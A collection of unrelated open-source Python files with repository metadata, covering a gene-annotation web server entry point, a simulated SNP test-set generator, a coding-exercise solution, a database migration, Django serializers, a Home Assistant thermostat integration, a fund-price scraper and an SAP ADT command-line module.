657337bf90a24e453740657f6c0d434ef21313c9 | cf62f7a7f9e13205fe83957fb7bfcf1b097bf481 | /src/index.py | a2ae504efaedb021f53a79f53ead655fd59982c9 | [
"Apache-2.0"
] | permissive | biothings/mygene.info | 09bf19f481c066789a4ad02a0d2880f31dae28f6 | fe1bbdd81bc29b412ca4288d3af38e47c0602ab7 | refs/heads/master | 2023-08-22T21:34:43.540840 | 2023-08-08T23:25:15 | 2023-08-08T23:25:18 | 54,933,630 | 89 | 20 | NOASSERTION | 2023-07-18T23:53:49 | 2016-03-29T00:36:49 | Python | UTF-8 | Python | false | false | 757 | py | """
Mygene Web Server Entry Point
Examples:
>>> python index.py
>>> python index.py --debug
>>> python index.py --port=8000
"""
import os.path
import config
from biothings.web.launcher import main
ADDON_HANDLERS = [
(r"/demo/?(.*)", "tornado.web.StaticFileHandler",
{"path": "docs/demo", "default_filename": "index.html"}),
]
if config.INCLUDE_DOCS:
if not os.path.exists(config.DOCS_STATIC_PATH):
raise IOError('Run "make html" to generate sphinx docs first.')
ADDON_HANDLERS += [
(r"/widget/(.*)", "tornado.web.RedirectHandler", {"url": "/static/widget/{0}"}),
(r"/?(.*)", "tornado.web.StaticFileHandler", {'path': config.DOCS_STATIC_PATH}),
]
if __name__ == '__main__':
main(ADDON_HANDLERS)
| [
"[email protected]"
] | |
981f3b685443c1e8fabdc340684e1a4a52e41de2 | e15fb687990589783066669784912ea8ac5bacaf | /genome_designer/test_data/full_vcf_test_set/generate_full_vcf_test_set.py | 9dac81496c35a6bb2eaa6bc20477bb1f155f8606 | [
"MIT"
] | permissive | RubensZimbres/millstone | 74d32105fa54104d0597b6789fb2871cb4fbd854 | 898936072a716a799462c113286056690a7723d1 | refs/heads/master | 2020-03-16T18:57:55.174716 | 2018-03-07T16:40:14 | 2018-03-07T16:40:14 | 132,894,394 | 1 | 2 | null | 2018-05-10T12:01:34 | 2018-05-10T12:01:33 | null | UTF-8 | Python | false | false | 5,259 | py | """
Script for generating the test set.
This document describes how this test set was generated.
1) Select a region of the MG1655 genome to excise.
"""
import copy
import random
from Bio import SeqIO
import vcf
import simNGS_util
# Portion of MG1655 Genbank of size ~5.5 kB
EXCISED_GENBANK = 'mg1655_tolC_through_zupT.gb'
TEMPLATE_VCF = 'template.vcf'
VCF_TEMPLATE_READER = vcf.Reader(TEMPLATE_VCF)
SAMPLE_FASTA_ROOT = 'sample'
DESIGNED_SNP_VCF = 'designed_snps.vcf'
# If we do a SNP every 100 bases, that's 50 SNPs.
# We'll then do 20 designed SNPs and 20 SNPs per sample so we should get
# fairly interesting overlaps.
TOTAL_SNPS = 50
NUM_IN_CDS = 45
NUM_OTHER = TOTAL_SNPS - NUM_IN_CDS
# We'll create this many genomes.
NUM_SAMPLES = 6
def is_position_in_coding_feature(position, cds_features):
"""Checks whether the given position lies inside of a coding feature
in the given genome record.
"""
for feature in cds_features:
if (feature.location.start <= position and
position < feature.location.end):
return True
return False
BASE_OPTIONS = ['A', 'T', 'G', 'C']
def choose_alt(ref):
"""Returns a random base that is not ref.
"""
alt = ref
while alt == ref:
alt = random.choice(BASE_OPTIONS)
return alt
def get_subset_of_snps(all_snps, subset_size):
all_snp_positions = all_snps.keys()
subset = {}
while len(subset) < subset_size:
pos = random.choice(all_snp_positions)
if pos in subset:
continue
subset[pos] = all_snps[pos]
return subset
def create_vcf_for_subset(subset, out_path):
with open(out_path, 'w') as designed_fh:
writer = vcf.Writer(designed_fh, VCF_TEMPLATE_READER,
lineterminator='\n')
for pos, value_dict in subset.iteritems():
writer.write_record(vcf.model._Record(
'Chromosome', # CHROM
pos, # POS
None, # ID
value_dict['ref'], # REF
value_dict['alt'], # ALT
None, # QUAL
None, # FILTER
None, # INFO
None, # FORMAT
None, # sample_indexes
samples=None))
def main():
seq_record = SeqIO.read(EXCISED_GENBANK, 'genbank')
cds_features = [f for f in seq_record.features if f.type == 'CDS']
# Generate all possible SNPs to sample from. Store them in a dictionary
# keyed by position so we can easily deal with lookups and avoiding
# duplicates as needed below.
all_snps = {}
len_seq_record = len(seq_record)
# Select random positions for SNPs, respecting the distribution
# set above by the NUM_IN_CDS vs TOTAL_SNPS constants.
# NOTE: These SNP positions are pythonic. We have to update them when
# writing them out in vcf format below.
num_in_cds = 0
num_other = 0
while num_in_cds < NUM_IN_CDS or num_other < NUM_OTHER:
position = random.randint(0, len_seq_record - 1)
if position in all_snps:
continue
in_cds_feature = is_position_in_coding_feature(position, cds_features)
do_add_position = False
if in_cds_feature and num_in_cds < NUM_IN_CDS:
do_add_position = True
num_in_cds += 1
elif not in_cds_feature and num_other < NUM_OTHER:
do_add_position = True
num_other += 1
if do_add_position:
ref = seq_record.seq[position]
alt = choose_alt(ref)
all_snps[position] = {
'ref': ref,
'alt': [alt]
}
assert len(all_snps) == TOTAL_SNPS, "Didn't get all the SNPs we expected."
# Now select a subset of these SNPS to serve as designed.
designed_snps = get_subset_of_snps(all_snps, 20)
create_vcf_for_subset(designed_snps, DESIGNED_SNP_VCF)
# Now create the samples.
for sample_num in range(NUM_SAMPLES):
sample_name = SAMPLE_FASTA_ROOT + str(sample_num)
sample_record = copy.deepcopy(seq_record)
sample_record.id = sample_name
# Grab a subset of SNPs.
sample_snps = get_subset_of_snps(all_snps, 20)
# Introduce the mutations.
for position, value_dict in sample_snps.iteritems():
sample_record.seq = (
sample_record.seq[:position] +
value_dict['alt'][0] +
sample_record.seq[position + 1:])
assert len(sample_record) == len(seq_record), (
"For now we are only doing mutations.")
# Write out the sample fasta.
sample_output = sample_name + '.fa'
with open(sample_output, 'w') as out_fh:
SeqIO.write(sample_record, out_fh, 'fasta')
# Generate fake reads using simNGS.
simLibrary_fasta = sample_name + '.simLibrary.fa'
print sample_output, simLibrary_fasta
simNGS_util.run_simLibrary(sample_output, simLibrary_fasta)
# Generate reads using simNGS.
output_fq = sample_name + '.simLibrary.fq'
simNGS_util.run_paired_simNGS(simLibrary_fasta, output_fq)
if __name__ == '__main__':
main()
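# Typical invocation (sketch): run from the directory holding the inputs named
# above (mg1655_tolC_through_zupT.gb, template.vcf) with simNGS available; the
# script uses Python 2 syntax, e.g.
#
#   python generate_full_vcf_test_set.py
#
# which writes designed_snps.vcf plus the per-sample .fa / .simLibrary.fa /
# .simLibrary.fq files for the six simulated samples.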
| [
"[email protected]"
] | |
899c5f0098afd90b2bbd71e177e514e42fe973d5 | 36d4c9a57b53f5e14acb512759b49fe44d9990d8 | /hackerrank/30-days-of-code/day-8.py | d6527ddafbd6b3abc73b984d4cbb1c5fe239558e | [] | no_license | yosef8234/test | 4a280fa2b27563c055b54f2ed3dfbc7743dd9289 | 8bb58d12b2837c9f8c7b1877206a365ab9004758 | refs/heads/master | 2021-05-07T22:46:06.598921 | 2017-10-16T18:11:26 | 2017-10-16T18:11:26 | 107,286,907 | 4 | 2 | null | null | null | null | UTF-8 | Python | false | false | 2,652 | py | # # -*- coding: utf-8 -*-
# Objective
# Today, we're learning about Key-Value pair mappings using a Map or Dictionary data structure. Check out the Tutorial tab for learning materials and an instructional video!
# Task
# Given N names and phone numbers, assemble a phone book that maps friends' names to their respective phone numbers. You will then be given an unknown number of names to query your phone book for; for each name queried, print the associated entry from your phone book (in the form name=phoneNumber) or Not found if there is no entry for name.
# Note: Your phone book should be a Dictionary/Map/HashMap data structure.
# Input Format
# The first line contains an integer, N, denoting the number of entries in the phone book.
# Each of the N subsequent lines describes an entry in the form of 2 space-separated values on a single line. The first value is a friend's name, and the second value is an 8-digit phone number.
# After the N lines of phone book entries, there are an unknown number of lines of queries. Each line (query) contains a name to look up, and you must continue reading lines until there is no more input.
# Note: Names consist of lowercase English letters and are first names only.
# Constraints
# 1 ≤ N ≤ 10^5
# 1 ≤ queries ≤ 10^5
# Output Format
# On a new line for each query, print Not found if the name has no corresponding entry in the phone book; otherwise, print the full name and phoneNumber in the format name=phoneNumber.
# Sample Input
# 3
# sam 99912222
# tom 11122222
# harry 12299933
# sam
# edward
# harry
# Sample Output
# sam=99912222
# Not found
# harry=12299933
# Explanation
# N=3
# We add the N subsequent (Key,Value) pairs to our map so it looks like this:
# phoneBook={(sam,99912222),(tom,11122222),(harry,12299933)}
# We then process each query and print Key=Value if the queried Key is found in the map, or Not found otherwise.
# Query 0: sam
# Sam is one of the keys in our dictionary, so we print sam=99912222.
# Query 1: edward
# Edward is not one of the keys in our dictionary, so we print Not found.
# Query 2: harry
# Harry is one of the keys in our dictionary, so we print harry=12299933.
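# The whole task reduces to one dictionary lookup per query. An equivalent way
# to write the lookup used in the solution below is dict.get with a sentinel:
#
#   entry = phonebook.get(name)
#   print((name + "=" + entry) if entry else "Not found")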
n=int(input())
phonebook = dict(input().split() for _ in range(n))
# The number of queries is unknown, so keep reading names until input runs out.
while True:
    try:
        name = input().strip()
    except EOFError:
        break
if name in phonebook:
print(name + "=" + phonebook[name])
else:
print("Not found") | [
"[email protected]"
] | |
8cdd0bd9d537ad94f769df4f3a1faf52e3fb8895 | 5760ff9bca037a2e85dde8ad4d583139ab8e128a | /migrations/versions/20150624090637_3606d4a47663_update_answercomment_model.py | c4dcdcc74edfefac69c1499b71d92697c7e86322 | [] | no_license | dianchang/dianchang | 5b58cbfcf6dfcd9c2c9d55c0612a9327086b8b54 | 3414cd5af0a66facd6ec4eb787e7646d04d8c96c | refs/heads/master | 2016-08-11T11:24:49.322330 | 2015-07-30T05:18:09 | 2015-07-30T05:18:09 | 36,111,229 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 645 | py | """Update AnswerComment model.
Revision ID: 3606d4a47663
Revises: 2040a458fc8a
Create Date: 2015-06-24 09:06:37.957787
"""
# revision identifiers, used by Alembic.
revision = '3606d4a47663'
down_revision = '2040a458fc8a'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.add_column('answer_comment', sa.Column('likes_count', sa.Integer(), nullable=True))
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_column('answer_comment', 'likes_count')
### end Alembic commands ###
| [
"[email protected]"
] | |
2fad265d11b5850de7947324b15cf3811b053d58 | 1b25efab9fd81f1c1b9cd484a13d530759809838 | /backend/dating/api/v1/serializers.py | 94acc95fb234b127aaf19304903f55ffff0256f5 | [] | no_license | crowdbotics-apps/test-31906 | 1728e7947b6cbd52dc123310647ec523914aa1aa | 2f6841d3ac3e4d335712fd11b3ee81166eec2f47 | refs/heads/master | 2023-08-30T11:31:54.409975 | 2021-11-10T07:26:53 | 2021-11-10T07:26:53 | 426,524,333 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 973 | py | from rest_framework import serializers
from dating.models import Setting, Like, UserPhoto, Match, Dislike, Inbox, Profile
class InboxSerializer(serializers.ModelSerializer):
class Meta:
model = Inbox
fields = "__all__"
class LikeSerializer(serializers.ModelSerializer):
class Meta:
model = Like
fields = "__all__"
class DislikeSerializer(serializers.ModelSerializer):
class Meta:
model = Dislike
fields = "__all__"
class UserPhotoSerializer(serializers.ModelSerializer):
class Meta:
model = UserPhoto
fields = "__all__"
class SettingSerializer(serializers.ModelSerializer):
class Meta:
model = Setting
fields = "__all__"
class ProfileSerializer(serializers.ModelSerializer):
class Meta:
model = Profile
fields = "__all__"
class MatchSerializer(serializers.ModelSerializer):
class Meta:
model = Match
fields = "__all__"
| [
"[email protected]"
] | |
b7af57cfe3b70002b84576ef64c5255279fa4d72 | bb33e6be8316f35decbb2b81badf2b6dcf7df515 | /source/res/scripts/client/gui/Scaleform/daapi/view/meta/TankmanOperationDialogMeta.py | e1d2fcccb7f4552ec5aef843bb1b493e8473c8d1 | [] | no_license | StranikS-Scan/WorldOfTanks-Decompiled | 999c9567de38c32c760ab72c21c00ea7bc20990c | d2fe9c195825ececc728e87a02983908b7ea9199 | refs/heads/1.18 | 2023-08-25T17:39:27.718097 | 2022-09-22T06:49:44 | 2022-09-22T06:49:44 | 148,696,315 | 103 | 39 | null | 2022-09-14T17:50:03 | 2018-09-13T20:49:11 | Python | UTF-8 | Python | false | false | 386 | py | # Python bytecode 2.7 (decompiled from Python 2.7)
# Embedded file name: scripts/client/gui/Scaleform/daapi/view/meta/TankmanOperationDialogMeta.py
from gui.Scaleform.daapi.view.dialogs.SimpleDialog import SimpleDialog
class TankmanOperationDialogMeta(SimpleDialog):
def as_setDataS(self, data):
return self.flashObject.as_setData(data) if self._isDAAPIInited() else None
| [
"[email protected]"
] | |
265522a7deada1360fac4df736f45501ac5024dc | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_285/ch5_2019_06_03_01_06_29_598637.py | b4bfd46781ff35c49180a25a814cd9a7dfae311a | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 506 | py | def verifica_primo(n):
if n<0:
return -1
num=3
while num<n:
if n%2==0 or n%num==0:
return False
num+=2
if n==0 or n==1:
return False
else:
return True
def maior_primo_menor_que(n):
if verifica_primo(n)== True:
return n
elif verifica_primo(n)== False:
lista=[]
for e in range(n):
if verifica_primo(n-e)==True:
return n-e
else:
return -1
| [
"[email protected]"
] | |
ecd1fe8a8b5678366ade3ae81684187a171f55f5 | 4c601eaa346e660c296e270cc2d79aea9a3721fe | /homeassistant/components/atag/__init__.py | 237a82f207a51306dfec01869827bd135973d15b | [
"Apache-2.0"
] | permissive | basnijholt/home-assistant | f55110af9ff602274c0a929c7298ef97a0ef282f | ba55b4b8338a2dc0ba3f1d750efea49d86571291 | refs/heads/dev | 2023-01-21T11:53:52.621353 | 2020-08-08T15:03:06 | 2020-08-08T15:03:06 | 220,313,680 | 5 | 1 | Apache-2.0 | 2023-01-13T06:04:49 | 2019-11-07T19:29:54 | Python | UTF-8 | Python | false | false | 4,345 | py | """The ATAG Integration."""
from datetime import timedelta
import logging
import async_timeout
from pyatag import AtagException, AtagOne
from homeassistant.components.climate import DOMAIN as CLIMATE
from homeassistant.components.sensor import DOMAIN as SENSOR
from homeassistant.components.water_heater import DOMAIN as WATER_HEATER
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import HomeAssistant, asyncio
from homeassistant.exceptions import ConfigEntryNotReady
from homeassistant.helpers.aiohttp_client import async_get_clientsession
from homeassistant.helpers.entity import Entity
from homeassistant.helpers.update_coordinator import DataUpdateCoordinator, UpdateFailed
_LOGGER = logging.getLogger(__name__)
DOMAIN = "atag"
PLATFORMS = [CLIMATE, WATER_HEATER, SENSOR]
async def async_setup(hass: HomeAssistant, config):
"""Set up the Atag component."""
return True
async def async_setup_entry(hass: HomeAssistant, entry: ConfigEntry):
"""Set up Atag integration from a config entry."""
session = async_get_clientsession(hass)
coordinator = AtagDataUpdateCoordinator(hass, session, entry)
await coordinator.async_refresh()
if not coordinator.last_update_success:
raise ConfigEntryNotReady
hass.data.setdefault(DOMAIN, {})
hass.data[DOMAIN][entry.entry_id] = coordinator
if entry.unique_id is None:
hass.config_entries.async_update_entry(entry, unique_id=coordinator.atag.id)
for platform in PLATFORMS:
hass.async_create_task(
hass.config_entries.async_forward_entry_setup(entry, platform)
)
return True
class AtagDataUpdateCoordinator(DataUpdateCoordinator):
"""Define an object to hold Atag data."""
def __init__(self, hass, session, entry):
"""Initialize."""
self.atag = AtagOne(session=session, **entry.data)
super().__init__(
hass, _LOGGER, name=DOMAIN, update_interval=timedelta(seconds=30)
)
async def _async_update_data(self):
"""Update data via library."""
with async_timeout.timeout(20):
try:
if not await self.atag.update():
raise UpdateFailed("No data received")
except AtagException as error:
raise UpdateFailed(error)
return self.atag.report
async def async_unload_entry(hass, entry):
"""Unload Atag config entry."""
unload_ok = all(
await asyncio.gather(
*[
hass.config_entries.async_forward_entry_unload(entry, component)
for component in PLATFORMS
]
)
)
if unload_ok:
hass.data[DOMAIN].pop(entry.entry_id)
return unload_ok
class AtagEntity(Entity):
"""Defines a base Atag entity."""
def __init__(self, coordinator: AtagDataUpdateCoordinator, atag_id: str) -> None:
"""Initialize the Atag entity."""
self.coordinator = coordinator
self._id = atag_id
self._name = DOMAIN.title()
@property
def device_info(self) -> dict:
"""Return info for device registry."""
device = self.coordinator.atag.id
version = self.coordinator.atag.apiversion
return {
"identifiers": {(DOMAIN, device)},
"name": "Atag Thermostat",
"model": "Atag One",
"sw_version": version,
"manufacturer": "Atag",
}
@property
def name(self) -> str:
"""Return the name of the entity."""
return self._name
@property
def should_poll(self) -> bool:
"""Return the polling requirement of the entity."""
return False
@property
def available(self):
"""Return True if entity is available."""
return self.coordinator.last_update_success
@property
def unique_id(self):
"""Return a unique ID to use for this entity."""
return f"{self.coordinator.atag.id}-{self._id}"
async def async_added_to_hass(self):
"""Connect to dispatcher listening for entity data notifications."""
self.async_on_remove(
self.coordinator.async_add_listener(self.async_write_ha_state)
)
async def async_update(self):
"""Update Atag entity."""
await self.coordinator.async_request_refresh()
| [
"[email protected]"
] | |
ef4e45fe551d5134930a7c4748f00fe58bf60c90 | 23ec2d36bc6f3706483b4d3c863ffd11b8247839 | /fundclear/models.py | f62dc5d7515d8b25124e2059be0c2a4056f9e151 | [] | no_license | slee124565/philcop | 4d6f536d2d0536d2c9110f4ea2d5b88995322cba | 592ce889f7eb59f4cf3c02a8ffa85cb505ee7add | refs/heads/master | 2021-01-11T03:58:55.028400 | 2018-01-06T15:30:45 | 2018-01-06T15:30:45 | 71,266,174 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,265 | py | import calendar
import logging
from google.appengine.ext import db
from lxml.html import document_fromstring
from lxml import etree
from datetime import date
from dateutil import parser
from dateutil.relativedelta import relativedelta
from urlsrc.models import WebContentModel
import phicops.utils
URL_TEMPLATE = 'http://announce.fundclear.com.tw/MOPSFundWeb/D02_02P.jsp?fundId={fund_id}&beginDate={begin_date}&endDate={end_date}'
DATE_INDEX = 0
VALUE_INDEX = 1
class dFundCodeModel(db.Model):
content = db.BlobProperty()
class FundClearModel(WebContentModel):
fund_name = db.StringProperty()
@classmethod
def get_fund(cls, p_fund_id, p_months=37):
if (p_fund_id == ''):
logging.warn('Invalid Parameter Value p_fund_id ' + p_fund_id)
return None
if p_months < 0:
            logging.warning('Invalid Parameter Value p_months ' + str(p_months))
return None
end_date = date.today() - relativedelta(days=+1)
begin_date = end_date - relativedelta(months=p_months)
t_url = URL_TEMPLATE.format(fund_id=p_fund_id,begin_date=begin_date.strftime("%Y/%m/%d"),end_date=end_date.strftime("%Y/%m/%d"))
fund_model = FundClearModel.get_or_insert_webcontent(p_fund_id,t_url,date.today(),p_months)
if fund_model == None:
logging.warning('FundClearModel get_fund fail')
return fund_model
def get_sample_value_list(self, p_date_list):
'''
return a list of [date, nav] according to date list p_date_list
'''
nav_list = self.get_value_list()
return self.sample_value_list(p_date_list, nav_list)
def get_nav_by_date(self, p_date):
nav_list = self.get_value_list()
t_count = 0
        # entries from get_value_list() already hold datetime.date objects
        if nav_list[0][DATE_INDEX] <= p_date:
            for t_entry in nav_list:
                if p_date == t_entry[DATE_INDEX]:
logging.debug(__name__ + ': get_nav_by_date: matched entry ' + str(nav_list[t_count]))
return nav_list[t_count-1][VALUE_INDEX]
t_count += 1
logging.warning(__name__ + ': get_nav_by_date: no matched date value exist!')
return False
def get_single_html_table(self):
stk_data = str(self.content).decode('big5')
t_page = document_fromstring(stk_data)
t_tables = t_page.xpath("//table")
t_total = len(t_tables)
#logging.info('total table count: ' + str(t_total))
if t_total < 4:
#return 'TABLE ERROR'
logging.warning('Source HTML TABLE Count ERROR')
return None
html = '<table width="100%" border="1" cellpadding="1" cellspacing="1">'
html += etree.tostring(t_tables[4][0])
for t_table in t_tables[5:-1]:
for t_child in t_table:
if (t_child.tag == 'tr'):
if t_child != None:
html += etree.tostring(t_child)
html += '</table>'
return html
def get_discrete_value_list(self, p_select_day=phicops.utils.MONTH_DAY_END):
value_list = self.get_value_list()
return phicops.utils.get_discrete_date_data_list(value_list, p_select_day)
def get_value_list(self):
'''
        return list of [datetime.date, float]
'''
dataset = []
stk_data = str(self.content).decode('big5')
t_page = document_fromstring(stk_data)
t_tables = t_page.xpath("//table")
t_total = len(t_tables)
logging.debug(__name__ + ', get_value_list: total table count: ' + str(t_total))
if t_total < 4:
logging.warning(__name__ + 'Source HTML TABLE ERROR, count ' + str(t_total))
return None
#logging.info('fund title:' + etree.tostring(t_tables[4][0][0]))
t_fund_name = t_tables[4][0][0].text
t_fund_name = t_fund_name.replace('\r\n','')
#t_fund_name = str(t_fund_name).encode('big5').splitlines()
#t_fund_name = t_fund_name[0]
logging.debug(__name__ + ', get_value_list: fund_name: ' + t_fund_name)
if (self.fund_name == None) or (self.fund_name != t_fund_name):
self.fund_name = t_fund_name
self.put()
t_count = 5
while (t_count <= (t_total-1)):
#logging.info('table child len ' + str(len(t_tables[t_count])))
if len(t_tables[t_count]) == 2:
t_date_list = [t_child.text for t_child in t_tables[t_count][0]]
t_value_list = [t_child.text for t_child in t_tables[t_count][1]]
#logging.info(t_date_list)
#logging.info(t_value_list)
#logging.info('t_count:' + str(t_count) + '/' + str(t_total))
for i in range(0,len(t_date_list)):
#logging.info('t_count:' + str(i) + '/' + str(len(t_date_list)))
#logging.info([t_date_list[i],t_value_list[i]])
if i != 0:
if (t_date_list[i].strip() != ''):
#logging.info([t_date_list[i],t_value_list[i]])
#dataset.append([calendar.timegm((parser.parse(t_date_list[i])).timetuple()) * 1000,t_value_list[i]])
dataset.append([t_date_list[i],str(t_value_list[i]).strip()])
#else:
# logging.debug('remove element ('+ str(t_count) + '#' + str(i) + '): ' + str([t_date_list[i],t_value_list[i]]))
else:
#logging.debug('skip table:\n' + etree.tostring(t_tables[t_count]))
logging.debug(__name__ + ', get_value_list: skip table ' + str(t_count))
t_count += 1
#break
t_count = 0
while (t_count < len(dataset)):
#logging.info('t_count ' + str(t_count))
(t_date,t_value) = dataset[t_count]
if (t_value == '--') or (t_value == 'N/A'):
if (t_count ==0):
#logging.debug(__name__ + ', get_value_list: removeing dataset element ' + str(dataset[t_count]))
del dataset[t_count]
continue
else:
#logging.debug('replace value with previous one, date ' + str(dataset[t_count]))
dataset[t_count][1] = dataset[t_count-1][1]
#if (t_count > 192):
# logging.info('DEBUG:' + str([t_date,t_value]))
dataset[t_count][0] = parser.parse(t_date).date()
dataset[t_count][1] = float(dataset[t_count][1])
t_count += 1
#logging.debug(dataset)
return dataset
def get_dateset(self):
'''
return Flow diagram data list
'''
dataset = []
stk_data = str(self.content).decode('big5')
t_page = document_fromstring(stk_data)
t_tables = t_page.xpath("//table")
t_total = len(t_tables)
logging.info('total table count: ' + str(t_total))
if t_total < 4:
logging.warning('Source HTML TABLE Count ERROR')
return None
#logging.info('fund title:' + etree.tostring(t_tables[4][0][0]))
t_fund_name = t_tables[4][0][0].text
t_fund_name = t_fund_name.replace('\r\n','')
#t_fund_name = str(t_fund_name).encode('big5').splitlines()
#t_fund_name = t_fund_name[0]
logging.info('fund_name: ' + t_fund_name)
if self.fund_name == None:
self.fund_name = t_fund_name
self.put()
t_count = 5
while (t_count <= (t_total-1)):
#logging.info('table child len ' + str(len(t_tables[t_count])))
if len(t_tables[t_count]) == 2:
t_date_list = [t_child.text for t_child in t_tables[t_count][0]]
t_value_list = [t_child.text for t_child in t_tables[t_count][1]]
#logging.info(t_date_list)
#logging.info(t_value_list)
#logging.info('t_count:' + str(t_count) + '/' + str(t_total))
for i in range(0,len(t_date_list)):
#logging.info('t_count:' + str(i) + '/' + str(len(t_date_list)))
#logging.info([t_date_list[i],t_value_list[i]])
if i != 0:
if (t_date_list[i].strip() != ''):
#logging.info([t_date_list[i],t_value_list[i]])
#dataset.append([calendar.timegm((parser.parse(t_date_list[i])).timetuple()) * 1000,t_value_list[i]])
dataset.append([t_date_list[i],t_value_list[i]])
else:
logging.info('remove element ('+ str(t_count) + '#' + str(i) + '): ' + str([t_date_list[i],t_value_list[i]]))
else:
logging.info('skip table:\n' + etree.tostring(t_tables[t_count]))
t_count += 1
#break
t_count = 0
while (t_count < len(dataset)):
#logging.info('t_count ' + str(t_count))
(t_date,t_value) = dataset[t_count]
if (t_value == '--') or (t_value == 'N/A'):
if (t_count ==0):
                    logging.warning('removing dataset element ' + str(dataset[t_count]))
del dataset[t_count]
continue
else:
logging.warning('replace value with previous one, date ' + str(dataset[t_count]))
dataset[t_count][1] = dataset[t_count-1][1]
#if (t_count > 192):
# logging.info('DEBUG:' + str([t_date,t_value]))
dataset[t_count][0] = calendar.timegm((parser.parse(t_date)).timetuple()) * 1000
dataset[t_count][1] = float(dataset[t_count][1])
t_count += 1
logging.info(dataset)
return dataset
| [
"[email protected]"
] | |
e050beb4b72499f095479534ef15503012f24674 | 8eb8f8d88994b22db7e661f0cdf6b0ed34a172bf | /sap/cli/object.py | 595a1294a6cb05cc0b517617033f29ad4a79cc2e | [
"Apache-2.0"
] | permissive | kksat/sapcli | f85d3376979157145436f5b87ee67ecf423b3ab4 | 8a21809d5a636f126a12d2da4af864b01867e490 | refs/heads/master | 2023-04-20T14:59:31.410367 | 2021-05-05T12:54:15 | 2021-05-05T12:54:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,255 | py | """ADT Object CLI templates"""
import sys
import os
import collections
import sap.cli.core
from sap.cli.core import InvalidCommandLineError, printout
import sap.errors
import sap.adt
import sap.adt.wb
import sap.cli.wb
_NAME_INDEX = 0
_SUFFIX_INDEX = 1
def object_name_from_source_file(filesystem_path):
"""Splits the given file system path into object name and suffix.
    It is expected that the object name makes up the file name prefix up to
    the first dot.
Example:
    ./src/object.abap
                 ^^^^--- suffix (the 2nd return value)
          ^^^^^^-------- object name (the 1st return value)
"""
basename = os.path.basename(filesystem_path)
parts = basename.split('.', 1)
if len(parts) <= 1 or not parts[_NAME_INDEX] or not parts[_SUFFIX_INDEX]:
raise InvalidCommandLineError(f'"{basename}" does not match the pattern NAME.SUFFIX')
return parts
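# Illustrative doctest-style sketch of the helper above; the file names are made-up
# examples, not taken from any real project:
#
#   >>> object_name_from_source_file('./src/zreport.abap')
#   ['zreport', 'abap']
#   >>> object_name_from_source_file('zcl_example.clas.abap')
#   ['zcl_example', 'clas.abap']
#   >>> object_name_from_source_file('README')
#   Traceback (most recent call last):
#       ...
#   InvalidCommandLineError: "README" does not match the pattern NAME.SUFFIX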
def write_args_to_objects(command, connection, args, metadata=None):
"""Converts parameters of the action 'write object' into a iteration of
objects with the text lines content
"""
name = args.name
text_lines = None
if name == '-':
for filepath in args.source:
if filepath == '-':
raise InvalidCommandLineError('Source file cannot be - when Object name is - too')
obj = command.instance_from_file_path(connection, filepath, args, metadata=metadata)
with open(filepath, 'r') as filesrc:
text_lines = filesrc.readlines()
yield (obj, text_lines)
elif len(args.source) == 1:
if args.source[0] == '-':
text_lines = sys.stdin.readlines()
else:
with open(args.source[0], 'r') as filesrc:
text_lines = filesrc.readlines()
yield (command.instance(connection, args.name, args, metadata=metadata), text_lines)
else:
raise InvalidCommandLineError('Source file can be a list only when Object name is -')
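# Illustrative sketch of the input shapes accepted by write_args_to_objects();
# the object and file names are made-up examples:
#   * args.name='ZREPORT', args.source=['zreport.abap'] -> one object, text read from the file
#   * args.name='-', args.source=['a.abap', 'b.abap']   -> one object per file, names deduced
#     from the file name prefixes ('a' and 'b')
#   * args.name='ZREPORT', args.source=['-']            -> one object, text read from stdin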
def printout_activation_stats(stats):
"""Prints out activation statistics"""
printout('Warnings:', stats.warnings)
printout('Errors:', stats.errors)
def printout_adt_object(prefix, obj):
"""Prints out ADT object in identifiable way"""
printout(f'{prefix}{obj.objtype.code} {obj.name}')
def activate_object_list(activator, object_enumerable, count):
"""Starts object activation and handles results"""
try:
stats = activator.activate_sequentially(object_enumerable, count)
except sap.cli.wb.StopObjectActivation as ex:
printout('Activation has stopped')
printout_activation_stats(ex.stats)
if ex.stats.active_objects:
printout('Active objects:')
for obj in ex.stats.active_objects:
printout_adt_object(' ', obj)
return 1
else:
printout('Activation has finished')
printout_activation_stats(stats)
if stats.inactive_objects:
printout('Inactive objects:')
for obj in stats.inactive_objects:
printout_adt_object(' ', obj)
return 1
return 1 if stats.errors > 0 else 0
class CommandGroupObjectTemplate(sap.cli.core.CommandGroup):
"""Template Class converting command line parameters to ADT Object methods
calls.
"""
def instance(self, connection, name, args, metadata=None):
"""Returns new instance of the ADT Object proxy class"""
raise NotImplementedError()
def instance_from_file_path(self, connection, filepath, args, metadata=None):
"""Returns new instance of the ADT Object proxy class
where the object name should be deduced from
the given file path.
"""
name, _ = object_name_from_source_file(filepath)
return self.instance(connection, name, args, metadata=metadata)
def build_new_metadata(self, connection, args):
"""Creates an instance of the ADT Object Metadata class for a new object"""
raise NotImplementedError()
def define_create(self, commands):
"""Declares the Create command with its parameters and returns
the definition.
        Notice that this command does not declare the parameter package,
        which should be created by descendants if necessary.
"""
create_cmd = commands.add_command(self.create_object, name='create')
create_cmd.append_argument('name')
create_cmd.append_argument('description')
create_cmd.declare_corrnr()
return create_cmd
def define_read(self, commands):
"""Declares the Read command with its parameters and returns
the definition
"""
read_cmd = commands.add_command(self.read_object_text, name='read')
read_cmd.append_argument('name')
return read_cmd
def define_write(self, commands):
"""Declares the Write command with its parameters and returns
the definition.
"""
write_cmd = commands.add_command(self.write_object_text, name='write')
write_cmd.append_argument('name',
help='an object name or - for getting it from the source file name')
write_cmd.append_argument('source', nargs='+',
help='a path or - for reading stdin; multiple allowed only when name is -')
write_cmd.append_argument('-a', '--activate', action='store_true',
default=False, help='activate after write')
write_cmd.append_argument('--ignore-errors', action='store_true',
default=False, help='Do not stop activation in case of errors')
